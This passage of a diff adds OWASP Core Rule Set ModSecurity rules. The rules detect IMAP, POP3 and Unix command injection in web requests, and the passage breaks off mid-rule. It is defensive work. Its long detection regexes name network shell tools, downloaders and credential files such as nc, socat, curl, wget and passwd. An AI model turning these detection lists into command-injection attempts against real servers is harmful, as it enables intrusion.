+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932310 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n[0-9A-Z_a-z]{1,50}\b (?:A(?:PPEND (?:[\"-#%-&\*\--9A-Z\x5c_a-z]+)?(?: \([ \x5ca-z]+\))?(?: \"?[0-9]{1,2}-[0-9A-Z_a-z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [\+\-][0-9]{4}\"?)? \{[0-9]{1,20}\+?\}|UTHENTICATE [\-0-9_a-z]{1,20}\r\n)|L(?:SUB (?:[\"-#\*\.-9A-Z_a-z~]+)? (?:[\"%-&\*\.-9A-Z\x5c_a-z]+)?|ISTRIGHTS (?:[\"%-&\*\--9A-Z\x5c_a-z]+)?)|S(?:TATUS (?:[\"%-&\*\--9A-Z\x5c_a-z]+)? \((?:U(?:NSEEN|IDNEXT)|MESSAGES|UIDVALIDITY|RECENT| )+\)|ETACL (?:[\"%-&\*\--9A-Z\x5c_a-z]+)? [\+\-][ac-eik-lpr-tw-x]+?)|UID (?:COPY|FETCH|STORE) (?:[\*,0-:]+)?|(?:(?:DELETE|GET)ACL|MYRIGHTS) (?:[\"%-&\*\--9A-Z\x5c_a-z]+)?)" \ + "id:932310,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: IMAP Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# =[ POP3 Command Execution ]= +# +# This rule prevents execution of POP3 related system commands. +# +# List of POP3 commands: +# - from rfc 1939 (https://www.rfc-editor.org/rfc/rfc1939#appendix-B) +# - extensions from rfc 2449 (https://www.rfc-editor.org/rfc/rfc2449) +# +# These commands all have some kind of parameter that makes them a good PL2 target. +# +# Regular expression generated from regex-assembly/932320.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932320 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n.*?\b(?:(?:LIST|TOP [0-9]+)(?: [0-9]+)?|U(?:SER .+?|IDL(?: [0-9]+)?)|PASS .+?|(?:RETR|DELE) [0-9]+?|A(?:POP [0-9A-Z_a-z]+ [0-9a-f]{32}|UTH [\-0-9A-Z_]{1,20} (?:(?:[\+/-9A-Z_a-z]{4})*(?:[\+/-9A-Z_a-z]{2}=|[\+/-9A-Z_a-z]{3}))?=))" \ + "id:932320,\ + phase:2,\ + block,\ + t:none,t:escapeSeqDecode,\ + msg:'Remote Command Execution: POP3 Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/137/134',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# [ Unix command injection ] +# +# This is a stricter sibling of rules 932230, 932235, 932250, 932260. +# This stricter sibling detects Unix RCE with and without prefix and words of any length. +# It uses the same regex. 
+# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932236.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932236 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*|(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*)[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\v&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine))[\s\v&\)<>\|]|pt(?:[\s\v&\)<>\|]|-get)|r(?:[\s\v&\)<>j\|]|(?:p|ch)[\s\v&\)<>\|]|ia2c)|s(?:h?[\s\v&\)<>\|]|cii(?:-xfr|85)|pell)|t(?:[\s\v&\)<>\|]|obm)|dd(?:group|user)|getty|nsible-playbook|xel)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[8-9]9|(?:a(?:t|ncel|psh)|c)[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|an|io|ulimit)|s(?:h|plit|vtool)|u(?:(?:t|rl)[\s\v&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)
))[\s\v&\)<>\|]|w(?:say|think))|r(?:ash[\s\v&\)<>\|]|on(?:tab)?))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\v&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\v&\)<>\|]|n(?:v(?:-update)?|d(?:if|sw))|qn|s(?:[\s\v&\)<>h\|]|ac)|x(?:(?:ec)?[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\v&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\v&\)<>\|]|le(?:[\s\v&\)<>\|]|test))|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|o(?:ld[\s\v&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\v]|ore)|db|e(?:(?:m|tfacl)[\s\v&\)<>\|]|ni(?:e[\s\v&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\v&\)<>\|]|nsh)|(?:o|awk)[\s\v&\)<>\|]|pg|r(?:c|ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|])|l(?:d(?:d?[\s\v&\)<>\|]|config)|(?:[np]|inks|ynx)[\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\v&\)<>\|]|il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\v&\)<>\|]|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:(?:re|unt)[\s\v&\)<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\
s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\|]|ing)|a(?:no[\s\v&\)<>\|]|sm|wk)|o(?:de[\s\v&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\v&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\v&\)<>\|]|p[^\s\v]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:f|l(?:5|sh)?|ms[\s\v&\)<>\|])|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\v&\)<>\|]|shd)|ython[^\s\v])|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v&\)<>\|]|u))|c(?:p[\s\v&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\v&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\v&\)<>\|]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\v&\)<>\|]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v&\)<>\|])|e(?:(?:d|lf|rvice)[\s\v&\)<>\|]|t(?:arch|env|facl[\s\v&\)<>\|]|sid)?|ndmail)|(?:g|ash|nap)[\s\v&\)<>\|]|h(?:(?:adow|ells)?[\s\v&\)<>\|]|\.distrib|u(?:f|tdown[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|bl|c(?:p(?:[\s\v&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:(?:out)?[\s\v&\)<>\|]|datectl))|o(?:p|uch[\s\v&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\v&\)<>\|]|diff)|ew[\s\v&\)<>\|]|gr|pw|rsh)|algrind|olatility[\s\v&\)<>\|])|w(
?:3m|c|a(?:ll|tch)[\s\v&\)<>\|]|get|h(?:iptail[\s\v&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\v&\)<>\|]|um)|z(?:ip(?:[\s\v&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|less|more|run|ypper))" \ + "id:932236,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection (command without evasion)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# This is a sibling of rule 932236. +# This sibling detects Unix RCE in request headers Referer and User-Agent. +# It uses the same regex but excludes known user-agents to avoid false positives. 
+#
+# Rule relations:
+#
+# .932230 (base rule, PL1, targets prefix + two and three character commands)
+# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+# ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+# .932250 (base rule, PL1, targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any length
+# - excluded words: known user-agents)
+#
+#
+#
+# Regular expression generated from regex-assembly/932239.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932239 +# +SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*|(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*)[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\v&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine))[\s\v&\)<>\|]|pt(?:[\s\v&\)<>\|]|-get)|r(?:[\s\v&\)<>j\|]|(?:p|ch)[\s\v&\)<>\|]|ia2c)|s(?:h?[\s\v&\)<>\|]|cii(?:-xfr|85)|pell)|t(?:[\s\v&\)<>\|]|obm)|dd(?:group|user)|getty|nsible-playbook|xel)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[8-9]9|(?:a(?:t|ncel|psh)|c)[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|io|ulimit)|s(?:h|plit|vtool)|u(?:t[\s\v&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\v&\)<>\|]|w(?:say|think))|r(?:ash[\s\v&
\)<>\|]|on(?:tab)?))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\v&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\v&\)<>\|]|n(?:v(?:-update)?|d(?:if|sw))|qn|s(?:[\s\v&\)<>h\|]|ac)|x(?:(?:ec)?[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\v&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\v&\)<>\|]|le(?:[\s\v&\)<>\|]|test))|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|o(?:ld[\s\v&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\v]|ore)|db|e(?:(?:m|tfacl)[\s\v&\)<>\|]|ni(?:e[\s\v&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\v&\)<>\|]|nsh)|(?:o|awk)[\s\v&\)<>\|]|pg|r(?:c|ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|])|l(?:d(?:d?[\s\v&\)<>\|]|config)|(?:[np]|ynx)[\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\v&\)<>\|]|il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\v&\)<>\|]|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:(?:re|unt)[\s\v&\)<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\
|]|ing)|a(?:no[\s\v&\)<>\|]|sm|wk)|o(?:de[\s\v&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\v&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\v&\)<>\|]|p[^\s\v]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:f|l(?:5|sh)?|ms[\s\v&\)<>\|])|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\v&\)<>\|]|shd)|ython[2-3])|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v&\)<>\|]|u))|c(?:p[\s\v&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\v&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\v&\)<>\|]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\v&\)<>\|]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v&\)<>\|])|e(?:(?:d|lf|rvice)[\s\v&\)<>\|]|t(?:arch|env|facl[\s\v&\)<>\|]|sid)?|ndmail)|(?:g|ash)[\s\v&\)<>\|]|h(?:(?:adow|ells)?[\s\v&\)<>\|]|\.distrib|u(?:f|tdown[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|bl|c(?:p(?:[\s\v&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:(?:out)?[\s\v&\)<>\|]|datectl))|o(?:p|uch[\s\v&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\v&\)<>\|]|diff)|ew[\s\v&\)<>\|]|gr|pw|rsh)|algrind|olatility[\s\v&\)<>\|])|w(?:c|a(?:ll|tch)[\s\v&\)<>\|]|h(?:iptail[\s\v&\)<>\|]|o(?
:ami|is))|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\v&\)<>\|]|um)|z(?:ip(?:[\s\v&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|less|more|run|ypper))" \ + "id:932239,\ + phase:1,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection found in user-agent or referer header',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# [ Unix shell snippets ] +# +# Detect some common sequences found in shell commands and scripts. +# +# Some commands which were restricted in earlier rules due to FP, +# have been added here with their full path, in order to catch some +# cases where the full path is sent. 
+#
+# Rule relations:
+#
+# .932160 (base rule, PL1, unix shell commands with full path)
+# ..932161 (stricter sibling, PL2, unix shell commands with full path in User-Agent and Referer request headers)
+#
+SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@pmFromFile unix-shell.data" \
+ "id:932161,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:cmdLine,t:normalizePath,\
